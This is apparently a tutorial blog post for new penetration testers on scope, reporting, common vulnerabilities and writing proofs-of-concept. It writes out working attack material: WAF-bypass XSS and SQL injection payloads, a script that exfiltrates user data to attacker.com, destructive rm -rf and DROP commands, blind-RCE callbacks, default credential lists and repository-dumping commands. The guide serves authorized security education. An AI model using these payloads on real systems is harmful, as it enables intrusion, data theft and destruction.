So, you’re a new penetration tester. You’ve earned your certifications, conquered the labs, and now you’re staring at your first real client engagement. Welcome to the battlefield.
Here’s the uncomfortable truth nobody told you in training: the “hack” is the easy to medium level part. The hard part is everything else – the communication, the reporting, navigating scope boundaries, and the delicate art of not getting yelled at, sued, or escorted out by security.
Your technical skills opened the door. These lessons will help you build a lasting career. Let’s dive into the common, painful mistakes junior testers make and the wisdom that separates professionals from liabilities.
Part 1: The “Career-Ending” Mistakes You Make Before You Even Start Testing
Before you even launch a single scan, you can make mistakes that will terminate your engagement, terrify your manager, and potentially land you in legal hot water. These aren’t just rookie errors, they’re career grenades.
1. The “Out of Scope” Nightmare π¨
The Scenario: You’re testing app.client.com. During reconnaissance, you discover a fascinating subdomain: jenkins.target-dev.com. It’s wide open, barely protected, practically begging to be compromised. You can’t resist. You pop a shell within minutes.
Then your phone rings. It’s your boss. The client is furious.
The Problem: That subdomain’s IP address belongs to a third-party SaaS provider. You didn’t just exceed your scope! you potentially committed unauthorized access against a completely different company. Welcome to felony territory.
The Lesson:
- READ YOUR SCOPE DOCUMENT. Then read it again. Print it. Highlight it. Tattoo it on your forearm if necessary.
- If you discover something that looks related but isn’t explicitly listed, STOP IMMEDIATELY.
- Run
whoison the IP address. Check DNS records. Verify ownership. - Contact your team lead or project manager before proceeding.
- Document everything: “Found X at timestamp Y, verified out of scope, did not test.”
Pro Tip: Create a “scope verification checklist” for every engagement:
β IP ranges explicitly defined
β Domain/subdomain whitelist confirmed
β Third-party services identified and excluded
β Testing timeframe agreed upon
β Emergency contact information documented
β Rules of engagement signed by all parties2. Failing to Define Clear, Measurable Objectives
You’re so excited to start “hacking” that you dive in without understanding what success looks like. You run automated scans, find a reflected XSS vulnerability, and proudly write it up.
The client responds: “That’s interesting, but our primary concern was whether an external attacker could access our customer payment database. Did you test that?”
Silence.
The Problem: A penetration test without clear objectives is just expensive noise. The difference between finding “any vulnerability” and answering “can an attacker steal customer data?” is the difference between a junior tester and a valuable consultant.
The Lesson:
- Start every engagement with a scoping call that defines specific, written objectives.
- Transform vague goals into testable scenarios.
Examples:
| β Vague Objective | β Clear Objective |
|---|---|
| “Test the web application” | “Determine if an unauthenticated external attacker can access, modify, or delete customer records in the production database” |
| “Check for security issues” | “Simulate an insider threat: can a low-privilege user escalate to domain administrator privileges?” |
| “Run some scans” | “Test whether the new payment processing module properly validates input and prevents injection attacks” |
3. Password Spraying the Entire Company Into Lockout Hell
You’ve obtained a list of 1,000 employee usernames from LinkedIn. You’ve compiled the top 10 most common passwords. You’re ready to be a hero. You fire up Hydra at 9:05 AM on Monday morning and unleash all 10 passwords against all 1,000 accounts simultaneously.
By 9:08 AM, the entire company is locked out of their systems. The help desk is melting down. The IT director is screaming. The client is threatening to terminate the engagement and withhold payment.
The Problem: You didn’t check the account lockout policy, and you used the “spray and pray” approach instead of the careful, measured technique that real attackers use.
The Lesson:
Before any authentication attack:
- Request or discover the account lockout policy (e.g., “5 failed attempts = 30-minute lockout”)
- Test with a sacrificial account first
- Calculate your attack window carefully
The Right Approach:
Bad: Try 10 passwords Γ 1,000 users = 10,000 requests in 3 minutes
Good: Try 1 password Γ 1,000 users = 1,000 requests
Wait 45+ minutes (beyond lockout window)
Try password 2 Γ 1,000 users = 1,000 requests
Repeat slowly, methodically
Example Safe Strategy:
- Monday 9:00 AM: Try “Summer2025!” against all users
- Monday 10:00 AM: Try “Welcome1!” against all users
- Monday 11:00 AM: Try “Password123!” against all users
This approach mimics real-world attackers (who are patient) and prevents operational disruption.
4. The IPv6 Blind Spot That Everyone Forgets
It’s 2025. Why are you only scanning IPv4?
The Scenario: You run a thorough Nmap scan against 10.0.0.5. Port 22 (SSH) shows as FILTERED-blocked by a firewall. You note it and move on.
A senior tester on your team casually runs: nmap -6 dead:beef::5
Port 22 shows OPEN.
The Problem: Many system administrators meticulously configure firewall rules (ACLs) for IPv4 but completely forget about the parallel IPv6 stack. It’s like locking your front door but leaving the back door wide open.
The Lesson:
- Always scan both IPv4 and IPv6 addresses
- Check if IPv6 is even enabled:
ping6 [target] - Many modern networks have IPv6 tunneling (6to4, Teredo) that creates hidden pathways
Example Commands:
# Standard IPv4 scan
nmap -sV -p- 192.168.1.100
# IPv6 scan of the same host
nmap -6 -sV -p- dead:beef::100
# Discover IPv6 addresses on local network
nmap -6 --script=ipv6-node-info fe80::1/64
5. Not Understanding the Legal Framework of Your Engagement
The Scenario: You find a SQL injection vulnerability that lets you access the database. While exploring, you discover a table containing Social Security numbers, credit card data, and medical records. You download 50 records as “proof” for your report.
Congratulations: you may have just violated HIPAA, PCI DSS, GDPR, and multiple privacy laws! even with a signed contract.
The Problem: Your authorization to test does not automatically grant you permission to exfiltrate sensitive data, especially PII (Personally Identifiable Information), PHI (Protected Health Information), or financial data.
The Lesson:
- Your Rules of Engagement should explicitly state data handling procedures
- When you find sensitive data access, demonstrate access without exfiltration
- Use
COUNT(*)queries to prove database access instead ofSELECT * - Take screenshots showing column names and row counts, not actual data
- If you must capture data, sanitize it immediately (hash it, redact it, or use dummy data)
Example Demonstration:
-- β BAD: Downloads actual customer data
SELECT * FROM customers LIMIT 50;
-- β
GOOD: Proves access without exfiltration
SELECT COUNT(*), MIN(customer_id), MAX(customer_id) FROM customers;
SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='customers';
Part 2: Your Report Is the Product, Not Your Exploit
You can uncover 100 critical vulnerabilities, but if you communicate them poorly, they will not get fixed. Clients don’t pay you to “hack”, they pay you for actionable intelligence delivered in a professional report.
1. Stop Delivering 500-Page Scanner Dumps
The Problem: You run Nessus, Acunetix, and Burp Scanner. The tools generate 500 pages of findings. You copy-paste everything into a document with minimal review. The client opens it and sees:
- 30 “High” severity findings
- 15 of them are false positives
- 8 are duplicates
- 3 are for third-party services they don’t control
Your credibility is now zero.
The Truth About Scanners: Automated scanners are pathological liars. They report findings based on signatures, patterns, and heuristics, not actual exploitation.
Your Job: Verify every finding manually. You’re not paid to run the scanner; you’re paid to validate the results.
Example:
Scanner Reports: "Blind SQL Injection (Time-Based) - HIGH"
Reason: Server responded after 5 seconds when payload injected
Your Verification:
1. Send request WITHOUT payload
2. Server still takes 5 seconds to respond
3. Conclusion: Not SQLi, just a slow API endpoint
4. Action: Remove from report, note as false positive
The Professional Approach:
- Manually verify every “Critical” and “High” finding
- Spot-check 25% of “Medium” findings
- Eliminate all obvious false positives
- Consolidate duplicates into a single finding
- Prioritize by actual business impact, not scanner severity
2. Not Maintaining Meticulous Evidence
The Scenario: During testing, you discover a critical authentication bypass. You’re excited, you test it quickly, it works perfectly. You make a mental note to document it later and continue testing.
Three days later, when writing the report, you realize:
- You didn’t save the exact HTTP request
- Your Burp history is a jumbled mess of 10,000 requests
- You can’t remember the exact payload or sequence
- You can’t reproduce it reliably
Your “critical” finding is now just an unverifiable rumor. The client won’t accept it.
The Lesson: Documentation is your armor. In any dispute, your contemporaneous notes and evidence are what protect you.
The Professional System:
For Every Finding:
β Timestamp of discovery
β Exact request (saved from Burp/tool)
β Exact response (full headers + body)
β Screenshot showing the vulnerability
β Screenshot showing the impact
β Steps to reproduce (written immediately)
β Notes on environmental factors
β Payload variations tested
Pro Tools:
- Use Burp’s “Save item” feature religiously
- Create a finding template for quick documentation
- Use screenshot tools with annotation (Greenshot, Flameshot)
- Maintain a testing journal with timestamps
- Use folders organized by finding severity and category
3. “It Didn’t Work” vs. “It Was Blocked” (Understanding Defense Mechanisms)
The Scenario: You send the payload <script>alert(1)</script> to test for XSS. The application returns a “403 Forbidden” page.
Junior Tester: Writes in notes: “XSS: Not vulnerable β”
Professional Tester: Writes: “XSS: Input blocked by WAF, bypass attempts in progress βοΈ”
The Insight: A 403 response doesn’t mean “not vulnerable”, it means something is actively defending against your attack. That defensive mechanism can potentially be bypassed.
Follow-Up Actions:
1. Identify the WAF (Cloudflare, Akamai, AWS WAF, ModSecurity)
2. Test bypass techniques:
- Case variation: <ScRiPt>alert(1)</ScRiPt>
- Encoding: %3Cscript%3Ealert(1)%3C/script%3E
- Alternative tags: <img src=x onerror=alert(1)>
- Fragmentation: <scr<script>ipt>alert(1)</script>
- Unicode: <script\u003Ealert(1)</script>
3. Test different injection points (headers, cookies, parameters)
4. Try time-delayed or out-of-band techniques
Key Principle: A block means “try harder.” Defensive mechanisms have weaknesses, misconfigurations, and bypass techniques. This is where you prove your value beyond running automated tools.
4. Stack Traces Are Treasure Maps, Not Just Error Messages
The Scenario: You trigger an error, and the application dumps a full Java stack trace:
java.lang.NullPointerException: Cannot invoke method on null object
at com.client.api.UserController.updateProfile(UserController.java:147)
at com.client.security.AuthFilter.doFilter(AuthFilter.java:89)
at org.apache.tomcat.version-8.5.23.core.ApplicationFilterChain.internalDoFilter
at /opt/client-app/production/webapps/api/WEB-INF/classes/...
Junior Tester: “Information Disclosure – Low Severity – Stack trace revealed”
Professional Tester: Extracts intelligence gold:
What This Reveals:
- Technology Stack: Apache Tomcat 8.5.23 (vulnerable to CVE-XXXX-XXXX)
- Framework: Spring Boot-style structure
- Internal Paths:
/opt/client-app/production/webapps/ - Code Structure:
UserController.javaline 147 has the vulnerable code - Authentication Filter:
AuthFilter.javasuggests custom auth implementation - Attack Surface: Now you know exactly which library versions to target with public exploits
The Professional Approach:
- Extract version numbers and check for known CVEs
- Use internal paths to craft more targeted attacks
- Understand the technology stack to tailor your methodology
- Map the application architecture from error messages
- Report this as “Information Disclosure + Attack Surface Mapping – Medium”
Part 3: The Real-World Vulnerabilities Hide in “Boring” Places
CTF challenges train you to find complex RCE vulnerabilities. Real-world applications fail in much simpler, stupider ways. Your colleagues will be far more impressed when you find critical business logic flaws that automated scanners completely miss.
1. Business Logic Flaws (Where Human Testing Shines)
The Scenario: You’ve tested an e-commerce site thoroughly. No SQLi, no XSS, no RCE. You’re about to report it as secure.
But then you start thinking like an attacker, not a scanner:
Test Cases Scanners Never Try:
A. Price Manipulation
1. Add a $100 item to cart
2. Intercept the checkout POST request
3. Change: {"item_id": 123, "price": 100.00}
To: {"item_id": 123, "price": 1.00}
4. Complete purchase
5. Result: You bought a $100 item for $1
B. IDOR (Insecure Direct Object Reference)
1. Log in as User A
2. Access invoice: /invoices/12345
3. Change to: /invoices/12346 (User B's invoice)
4. Result: You can view any user's invoices by guessing IDs
C. Coupon Code Reuse
1. Apply coupon "SAVE50" (50% off, single-use)
2. Complete purchase
3. Intercept final payment request
4. Replay the request with the same coupon code
5. Result: Unlimited use of single-use coupons
D. Quantity Manipulation
1. Add 1 item to cart (stock: 5 remaining)
2. Change quantity to -5 in POST request
3. Result: Negative quantities might credit your account instead of debiting
E. Race Condition in Transactions
1. Account balance: $100
2. Send two simultaneous $75 withdrawal requests
3. Both might succeed if the application doesn't use proper locking
4. Result: You withdrew $150 from a $100 balance
The Lesson: These vulnerabilities require human creativity. No scanner will ever find them because they require understanding business logic, user workflows, and creative abuse of legitimate features.
2. Testing the Defenses Themselves (IDS/SIEM/WAF Effectiveness)
Your job isn’t just to find vulnerabilities, it’s to determine if the client would even notice if they were under attack.
The Test:
- Perform an obviously malicious action (noisy Nmap scan, blatant SQLi attempt)
- Wait 24-48 hours
- Ask the client: “Did your security team detect any suspicious activity on [date/time]?”
Common Results:
- Best Case: “Yes, we saw it immediately and investigated”
- Common Case: “We see logs but nobody reviewed them”
- Worst Case: “We have no record of any unusual activity” (despite your attack)
The Critical Finding: If their multi-million dollar SIEM, IDS/IPS, and SOC didn’t detect or respond to obvious attack patterns, that’s potentially more critical than the vulnerabilities themselves.
Example Report Section:
Finding: Lack of Detection and Response Capability
Severity: CRITICAL
During the engagement, the following malicious activities were performed:
- Full port scan of production network (Date/Time)
- 50+ SQL injection attempts (Date/Time)
- Multiple authentication failures (Date/Time)
- Successful privilege escalation (Date/Time)
When queried, the security team had no record of these events.
Impact: An attacker could compromise the entire network without detection.
3. The “Forgot Password” Functionality (Logic Flaw Paradise)
This single feature is a goldmine for logic flaws. Nearly every implementation has issues.
Common Vulnerabilities:
A. User Enumeration
Test: Request password reset for existing vs. non-existing emails
Vulnerable Response:
- exists@client.com β "Reset link sent to your email"
- fake@fake.com β "No account found with this email"
Impact: Attacker can enumerate all registered users
B. Weak Reset Tokens
Example token: base64(username:timestamp)
1. Request reset for victim@client.com
2. Token received: dXNlckBjbGllbnQuY29tOjE2MzY1NTUyMDA=
3. Decode: user@client.com:1636555200
4. Generate token for admin@client.com by encoding it
5. Reset admin's password
Impact: Any user account can be taken over
C. Token Doesn’t Expire
1. Request password reset
2. Receive token in email
3. Wait 48 hours (or 6 months)
4. Token still works
Impact: Old emails = permanent account access vectors
D. Token Reuse After Password Change
1. User requests password reset (Token A generated)
2. User requests second reset (Token B generated)
3. User uses Token B to reset password
4. Token A still works
Impact: Multiple valid tokens create extended attack window
E. Reset Token Sent Over Unencrypted Channel
Email content: "Click here to reset: http://client.com/reset?token=abc123"
Impact: Token interceptable by network attackers (MITM)
Should be: https://client.com/reset?token=abc123
4. Default Credentials (Still Everywhere in 2025)
The Reality: Despite decades of security awareness, default credentials remain shockingly common.
Where to Check:
Common Locations:
β Main application login
β Admin portal (/admin, /administrator, /backend)
β Database interfaces (phpMyAdmin, Adminer)
β Application servers (Tomcat Manager :8080, JBoss :9090)
β CI/CD systems (Jenkins, GitLab, Bamboo)
β Monitoring tools (Grafana, Kibana, Prometheus)
β Network devices (routers, switches, firewalls)
β IoT/embedded devices (cameras, printers, HVAC)
β API documentation (Swagger UI, GraphQL playground)
Common Default Credentials:
admin:admin
admin:password
admin:Password123
root:root
root:toor
tomcat:tomcat
tomcat:s3cret
administrator:password
guest:guest
demo:demo
test:test
[blank]:[blank]
Pro Tip: Don’t just try the main application. Check every exposed port and service. That forgotten Jenkins instance on port 8080 is often the easiest way in.
5. Hidden Treasure in Comments and Metadata
HTML Source Code Comments:
Developers leave embarrassing gifts in comments:
<!-- TODO: Remove this debug endpoint before production -->
<!-- /api/admin/debug/users -->
<!-- Staging server: http://staging-internal.client.local -->
<!-- Admin password temporarily set to: TempPass2025! -->
<!-- Old endpoint (deprecated but still works): /api/v1/admin_beta_unsec_DONOTUSE -->
Your Job: View source on every significant page. Developers comment out sensitive information instead of deleting it.
Document Metadata:
# Download a PDF from the website
wget https://client.com/company-report.pdf
# Extract metadata
exiftool company-report.pdf
# Common findings:
Creator: John.Admin@internal-client.local
Producer: Microsoft Word (C:\Users\jadmin\Documents\Internal\)
Author: James Administrator
Creation Date: 2025:01:15 09:43:22-05:00
Software: Acrobat PDFWriter 9.0 (Windows Server 2012 R2)
What This Reveals:
- Internal username format: first.last
- Internal email domain: internal-client.local
- Internal file paths: C:\Users\jadmin\
- Operating system: Windows Server 2012 R2
- Employee names: James Administrator (jadmin)
Other Metadata Sources:
- Office documents (.docx, .xlsx, .pptx)
- Images (EXIF data revealing GPS coordinates, camera models, timestamps)
- PDFs (creation software, internal paths)
6. Session Management (Testing It Properly)
Common Mistake:
Wrong Way to Test Session Expiration:
1. Log in
2. Click "Logout"
3. Press browser "Back" button
4. See if you can access pages
5. Conclude: Session not invalidated
Problem: Browser is showing cached pages, not testing server-side session
The Right Way:
Proper Session Invalidation Test:
1. Log in and capture your session cookie
Example: session_id=abc123xyz789
2. Use the application normally (establish active session)
3. Copy the FULL cookie string
4. Log out through the application
5. Using Burp Repeater or curl, send a request with the OLD cookie:
curl -H "Cookie: session_id=abc123xyz789" \
https://client.com/api/user/profile
6. If you receive legitimate data (not a redirect to login),
the session was NOT invalidated server-side
Impact: Attacker with stolen cookies can access accounts indefinitely
Additional Session Tests:
A. Concurrent Session Limits
1. Log in on Browser A
2. Log in on Browser B (same account)
3. Check if Browser A session is still valid
4. Finding: No concurrent session limit = shared account abuse
B. Session Fixation
1. Get a session ID before login: session_id=attacker_controlled
2. Trick victim into logging in with this session ID
3. Session ID remains the same after authentication
4. Attacker can hijack the authenticated session
C. Session Cookie Security Flags
Check cookie attributes:
β Secure flag (only sent over HTTPS)
β HttpOnly flag (not accessible via JavaScript)
β SameSite attribute (CSRF protection)
Example bad cookie:
Set-Cookie: session_id=abc123
Example good cookie:
Set-Cookie: session_id=abc123; Secure; HttpOnly; SameSite=Strict
Part 4: Advanced Topics (Separating Good from Great)
1. API Testing (The Modern Attack Surface)
Most organizations now have REST APIs, GraphQL endpoints, and mobile APIs that are completely separate from their web application, and often less protected.
Common API Vulnerabilities:
A. BOLA (Broken Object Level Authorization)
# List your own orders
GET /api/v1/orders/user/123
Response: [{"order_id": 5001, "user_id": 123, "total": 49.99}]
# Try accessing someone else's order directly
GET /api/v1/orders/5002
Response: {"order_id": 5002, "user_id": 456, "total": 299.99}
Finding: Can access any order without authorization check
B. Excessive Data Exposure
# Mobile app only displays: name, email
GET /api/v1/users/123
Response (includes unnecessary sensitive data):
{
"id": 123,
"name": "John Doe",
"email": "john@example.com",
"ssn": "123-45-6789", β Not needed by mobile app
"password_hash": "$2b$12$...", β Should NEVER be returned
"credit_card": "4111-****-****-1111" β Not needed by mobile app
}
C. Mass Assignment
# Normal user update request
POST /api/v1/users/123
{"name": "New Name", "email": "new@email.com"}
# Add unauthorized fields
POST /api/v1/users/123
{
"name": "New Name",
"email": "new@email.com",
"role": "admin", β Should be rejected
"is_verified": true β Should be rejected
}
If successful: Privilege escalation via mass assignment
D. GraphQL-Specific Issues
# Introspection query (should be disabled in production)
query {
__schema {
types {
name
fields {
name
}
}
}
}
Result: Complete API schema exposed, revealing all hidden endpoints
2. Cloud Misconfigurations (The Low-Hanging Fruit)
A. S3 Buckets
# Common naming patterns
http://client-backups.s3.amazonaws.com
http://s3.amazonaws.com/client-backups
http://client-dev.s3.amazonaws.com
http://client-prod-data.s3.amazonaws.com
# Test for public access
aws s3 ls s3://client-backups --no-sign-request
# If successful, try downloading
aws s3 sync s3://client-backups ./local-folder --no-sign-request
B. Exposed .git Directories
# Check if .git is exposed
https://client.com/.git/config
# If accessible, download entire repository
wget --mirror --include-directories=/.git https://client.com/.git/
# Extract repository
git checkout -- .
# Search for secrets
git log -p | grep -i "password\|api_key\|secret\|token"
C. Environment Files
Common exposed files:
/.env
/.env.production
/.env.backup
/config/database.yml
/wp-config.php.bak
/web.config
3. Social Engineering (The Human Factor)
If authorized by the client, test the human element:
A. Phishing Campaigns (Controlled)
Example Safe Phishing Test:
1. Create fake "IT Department" email
2. Link goes to: https://client-sso-login.pentest-domain.com
3. Track: Who clicked? Who entered credentials?
4. Immediately notify users who entered credentials (education)
5. Report click/credential entry rates to client
B. Physical Security (If Applicable)
Tests:
- Can you tailgate through secure doors?
- Will reception grant access without verification?
- Are workstations left unlocked?
- Are sensitive documents left on desks/printers?
- Can you access server rooms?
C. Help Desk Social Engineering
Test (with explicit permission):
- Call help desk: "I'm locked out of my account"
- Use pretexting: "I'm a contractor, first day, need VPN access"
- Test if they verify identity before resetting passwords
- Test if they grant access without proper authorization
4. Supply Chain and Third-Party Risks
A. JavaScript Dependencies
# Check for vulnerable libraries
# Look at loaded JavaScript files
https://client.com/assets/jquery-1.4.2.min.js β Ancient, vulnerable
# Check for known CVEs
# Test specific exploits for that version
B. Subdomain Takeover
# Find subdomains
amass enum -d client.com
# Results might include:
blog.client.com CNAMEβ old-blog.herokuapp.com (doesn't exist anymore)
# Test takeover
1. Create new Heroku app called "old-blog"
2. Navigate to blog.client.com
3. If you see your content: CRITICAL subdomain takeover
C. Third-Party Widgets
Examples:
- Chat widgets (Intercom, Drift, Zendesk)
- Analytics (Google Analytics, Mixpanel)
- Payment processors (Stripe, PayPal)
- Social media plugins
Risk: XSS in third-party widget = XSS on client's site
Part 5: Writing Proofs-of-Concept That Actually Get Fixed
This is the most important skill. If a developer cannot reproduce your finding in 5 minutes, they will close the ticket as “Cannot Reproduce” or “Works As Designed.”
Your PoC is not a trophy, it’s a step-by-step recipe for a busy, skeptical developer who doesn’t trust you yet.
Rule 1: The curl Command is King
Screenshots of Burp are helpful, but they’re static and ambiguous. A copy-pasteable curl command is the gold standard.. it removes all uncertainty.
Bad PoC:
"I sent a POST request to /api/login with a single quote in the username field.
The application returned a SQL error."
Problems:
- Which headers did you send?
- Was it JSON or form-data?
- Was authentication required?
- What was the exact payload?
Good PoC:
# This curl command demonstrates an unauthenticated SQL injection.
# The server will respond with a 500 error and a full database stack trace.
curl -i -s -k -X POST \
-H "Content-Type: application/json" \
-H "User-Agent: Mozilla/5.0" \
-d '{"username":"admin'"'"'", "password":"password123"}' \
https://vulnerable-app.com/api/v1/login
# Expected result: 500 Internal Server Error with SQL exception in response
Why This Works:
- Completely unambiguous
- Developer can paste and run immediately
- Includes all necessary headers
- Shows expected result
Rule 2: Specify Prerequisites and User Roles
Bad:
"Navigate to /admin/delete-user/55 to delete any user account."
Problems:
- From what user role?
- What authentication state?
- Is this authorization bypass or lack of access control?
Good:
**Prerequisite:** Authenticated as Standard User (non-admin)
**Test Account:** testuser@client.com / TestPass123!
1. Log in as the standard user account
2. Obtain your session cookie
3. Send the following request:
curl -X POST https://client.com/admin/delete-user/55 \
-H "Cookie: session_id=[YOUR_SESSION_COOKIE]"
4. Observe: User ID 55 is deleted, despite being a standard user
**Expected Behavior:** Should return 403 Forbidden
**Actual Behavior:** Returns 200 OK and deletes the user
Rule 3: Use Benign, Non-Destructive Payloads
Your PoC must prove the vulnerability without causing panic or damage. Your goal is to demonstrate impact, not create it.
Bad RCE PoC:
; rm -rf /var/www/html
; DROP DATABASE production;
; shutdown -h now
Why This is Terrible: This will get you fired, sued, or arrested. You’re demonstrating you can cause damage by… actually causing damage.
Good RCE PoC:
; whoami
; id
; cat /etc/passwd
; pwd
Why This Works: Proves command execution without harm. Any developer can verify without risk.
For Blind RCE (no output visible):
; sleep 10
; ping -c 4 [YOUR_MONITORING_SERVER]
; curl https://your-listener.com/callback
SQL Injection – Bad vs. Good:
β Bad:
'; DROP TABLE users; --
'; UPDATE users SET password='hacked123'; --
β Good:
' OR '1'='1
' UNION SELECT username, password, email FROM users LIMIT 1; --
' AND 1=0 UNION SELECT @@version, database(), user(); --
XSS – Bad vs. Good:
β Bad:
<script>
fetch('/api/users').then(r=>r.json()).then(d=>{
fetch('https://attacker.com/steal?data='+JSON.stringify(d))
})
</script>
β Good:
<script>alert('XSS: ' + document.domain)</script>
<img src=x onerror=alert(document.cookie)>
Rule 4: Handle “Blind” Vulnerabilities Properly
The developer can’t see your Burp Collaborator pings or your tcpdump output. Telling them “I received a callback” is completely useless.
Bad PoC for Blind Command Injection:
"I injected ; curl https://my-server.com and received a hit on my server."
Good PoC for Blind Command Injection:
# Send this request:
curl -X POST https://client.com/api/process \
-H "Content-Type: application/json" \
-d '{"input": "test; sleep 15"}'
# Observe: The response takes exactly 15 seconds (baseline: ~200ms)
# To verify independently:
1. Send normal request: {"input": "test"}
β Response time: ~200ms
2. Send exploit request: {"input": "test; sleep 15"}
β Response time: ~15,200ms
The 15-second delay proves command execution.
Alternative for Blind RCE:
# If you need out-of-band verification:
Payload: ; nslookup test-$(whoami).your-domain.com
Instructions for verification:
1. Send the payload via the vulnerable endpoint
2. Monitor DNS logs for your domain
3. You should see a DNS query for: test-[username].your-domain.com
4. The [username] portion proves command execution
Developer verification:
- Set up your own DNS logging (tcpdump, Wireshark, or burpcollaborator)
- Send the payload
- Check your logs for the unique identifier
Rule 5: Highlight Dynamic Values (Prevent Copy-Paste Failures)
The Problem: You provide a perfect PoC, but it includes your session cookie that expired 3 hours ago. The developer pastes it, gets “401 Unauthorized,” and closes the ticket.
Bad:
curl -X POST https://api.client.com/update-email \
-H "Cookie: session_id=abc123xyz789" \
-H "X-CSRF-Token: tkn_1234567890" \
-d 'email=attacker@evil.com'
Good:
# β οΈ IMPORTANT: Replace the placeholder values with fresh ones
curl -X POST https://api.client.com/update-email \
-H "Cookie: session_id=[INSERT_YOUR_SESSION_COOKIE]" \
-H "X-CSRF-Token: [INSERT_FRESH_CSRF_TOKEN]" \
-d 'email=attacker@evil.com'
# How to obtain these values:
# 1. Log in to the application
# 2. Open Browser DevTools β Application β Cookies
# 3. Copy the 'session_id' cookie value
# 4. View page source, find: <meta name="csrf-token" content="...">
# 5. Replace the placeholders above with these values
Even Better – Provide a Script:
#!/usr/bin/env python3
"""
PoC for CVE-2025-XXXXX - IDOR in Email Update Endpoint
"""
import requests
# Configuration
TARGET = "https://api.client.com"
SESSION_COOKIE = input("Enter your session_id cookie: ")
CSRF_TOKEN = input("Enter your CSRF token: ")
VICTIM_USER_ID = "12345"
# Exploit
headers = {
"Cookie": f"session_id={SESSION_COOKIE}",
"X-CSRF-Token": CSRF_TOKEN
}
response = requests.post(
f"{TARGET}/api/users/{VICTIM_USER_ID}/email",
headers=headers,
json={"email": "attacker@evil.com"}
)
print(f"Status: {response.status_code}")
print(f"Response: {response.text}")
if response.status_code == 200:
print("\n[!] SUCCESS: Email updated for victim user!")
else:
print("\n[X] FAILED: Check your credentials")
Rule 6: Clean, Annotated Screenshots
If you must use screenshots (and you should, for visual confirmation):
Bad Screenshot:
- Entire 4K screen capture
- 37 open browser tabs visible
- Personal bookmarks showing
- System clock shows it’s 3 AM
- No indication of what you want viewer to see
Good Screenshot:
- Tightly cropped to relevant area
- Red box highlighting the payload
- Red arrow pointing to the result
- Sensitive data redacted (black boxes)
- Clear before/after if applicable
Tools for Professional Screenshots:
- Greenshot (Windows) – Built-in annotation
- Flameshot (Linux) – Excellent annotation tools
- Snagit (Commercial) – Professional-grade
- macOS Screenshot (Cmd+Shift+4) + Preview for annotation
Screenshot Checklist:
β Cropped to relevant content only
β Sensitive data redacted/blurred
β Payload clearly highlighted
β Result clearly highlighted
β Timestamp visible (if relevant)
β URL bar visible (shows the vulnerable endpoint)
β Saved in loss-less format (PNG, not JPG)
Rule 7: Use a Numbered, Step-by-Step Recipe
Don’t assume technical knowledge. A junior PM or a non-technical stakeholder might need to verify your finding.
Bad:
"The profile bio field is vulnerable to stored XSS."
Good:
**Finding:** Stored XSS in Profile Bio Field
**Prerequisites:**
- Web browser (Chrome or Firefox)
- Test account credentials: testuser@client.com / TestPass123!
**Step-by-Step Reproduction:**
1. Navigate to https://client.com/login
2. Enter username: testuser@client.com
3. Enter password: TestPass123!
4. Click "Login"
5. Navigate to "Profile Settings" (/profile/edit)
6. Locate the "Bio" text field
7. Enter the following payload exactly:
<img src=x onerror=alert('XSS-'+document.domain)>
8. Click "Save Profile"
9. Navigate to your public profile page (/profile/view/[your-user-id])
10. Observe: An alert box appears displaying "XSS-client.com"
**Expected Behavior:** The payload should be sanitized or encoded
**Actual Behavior:** The payload executes as JavaScript
**Impact:** Any user visiting this profile will execute the attacker's JavaScript,
enabling session theft, phishing, or defacement.
**Cleanup Steps:**
11. Return to Profile Settings
12. Clear the Bio field completely
13. Click "Save Profile" to remove the payload
Rule 8: Specify Environment and Prerequisites
A vulnerability might only exist in specific circumstances.
Example 1: Environment-Specific
**Environment:** Staging environment only (https://staging.client.com)
**Version:** Application version 2.3.1 (check footer)
**Feature Flag Required:** "New Dashboard" must be enabled
Note: This vulnerability was NOT found in the production environment (v2.2.9)
Example 2: Configuration-Specific
**Prerequisite:** Only exploitable when:
- SSL/TLS verification is disabled in the mobile app
- User connects through an untrusted network
- Attacker has man-in-the-middle position
This is a real-world scenario in coffee shops, airports, etc.
Example 3: Timing-Specific
**Timing Requirement:** Race condition vulnerability
- Requires 2+ simultaneous requests
- Success rate: ~30% (may require multiple attempts)
- Use provided Python script for reliable exploitation
Rule 9: Don’t Forget Browser/Platform Nuances
The Scenario: You found a DOM-based XSS that works perfectly in Firefox. The developer tests in Chrome.. it fails. Ticket closed.
The Solution:
**Browser Requirement:** This payload only triggers in Firefox and Safari
Reason: These browsers parse SVG namespaces differently than Chromium-based browsers
Payload: <svg><use href="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg'
xmlns:xlink='http://www.w3.org/1999/xlink' width='100' height='100'><a xlink:href='javascript:alert(1)'>
<rect x='0' y='0' width='100' height='100'/></a></svg>#x"/></svg>
Testing Instructions:
1. Open Firefox (version 95+)
2. Follow the reproduction steps
3. The payload will trigger
Note: Chrome/Edge will NOT trigger this payload due to stricter SVG parsing
Mobile-Specific Issues:
**Platform:** iOS Safari only
**Version:** iOS 15.x and earlier
This vulnerability does NOT affect:
- Android Chrome
- iOS Chrome (different rendering engine)
- Desktop browsers
Rule 10: Cleanup and Professional Courtesy
Don’t be the tester who leaves <script>alert('hacked')</script> in production for the next 6 months, causing confusion and triggering alerts.
Add a Cleanup Section:
**Cleanup Instructions:**
After verification, please remove the test data:
1. Log in to the admin panel
2. Navigate to: Users β Search
3. Find test user: testpentester@example.com
4. Delete this user account
5. Navigate to: Database β Direct Query
6. Execute: DELETE FROM comments WHERE content LIKE '%<script>alert%';
7. Clear application cache
8. Verify public profile no longer shows the XSS payload
All test artifacts have been documented in this report.
Rule 11: When in Doubt, Record a Video
Some vulnerabilities are complex (race conditions, multi-step business logic flaws, subtle timing issues). If your written explanation exceeds 15 steps, just record a video.
Tools:
- OBS Studio (Free, professional)
- SimpleScreenRecorder (Linux)
- macOS QuickTime (Built-in)
- Loom (Quick web-based recording)
Video Best Practices:
β Length: Under 3 minutes (attention span)
β Narrate your actions clearly
β Show your cursor
β Highlight important elements
β Show both the exploit and the result
β End with a clear "impact statement"
β Upload to private YouTube/Vimeo with unlisted link
β Include link in report
Example:
**Video Demonstration:**
A video walkthrough is available here: [PRIVATE_LINK]
Duration: 2:14
Demonstrates: Full account takeover via race condition
The video shows:
1. Creating two simultaneous withdrawal requests
2. Both succeeding despite insufficient balance
3. Resulting account state showing negative balance
Part 6: Communication and Professionalism
1. Real-Time Communication During Testing
Don’t be a ghost who disappears for 2 weeks and delivers a report. Professional pentesters communicate throughout the engagement.
